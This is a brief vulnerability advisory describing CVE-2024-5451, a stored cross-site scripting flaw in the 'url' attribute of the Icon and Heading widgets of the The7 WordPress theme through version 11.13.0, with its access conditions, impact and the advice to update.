CVE-2024-5451

Vulnerability

Overview CVE-2024-5451 is a Stored Cross-Site Scripting vulnerability in The7 — Website and eCommerce Builder for WordPress theme, affecting versions up to and including 11.13.0. The issue arises from insufficient input sanitization and output escaping on the 'url' attribute within the Icon and Heading widgets. This allows authenticated attackers with contributor-level access or higher to inject arbitrary web scripts.

Exploitation

Conditions To exploit this vulnerability, an attacker must have at least contributor-level access to the WordPress site. They can then inject malicious scripts via the 'url' attribute in the affected widgets. The injected script will be stored and executed whenever a user visits the compromised page.

Impact

Successful exploitation leads to arbitrary script execution in the context of a victim's browser. This can result in data theft, session hijacking, defacement, or other malicious activities. The vulnerability can affect any user visiting the page, including administrators.

Mitigation

The vendor, Dream-Theme, has released updates beyond version 11.13.0. While the specific changelog does not explicitly mention CVE-2024-5451, the theme's development history shows ongoing security fixes [1]. Users should update to the latest version of The7 to mitigate this vulnerability.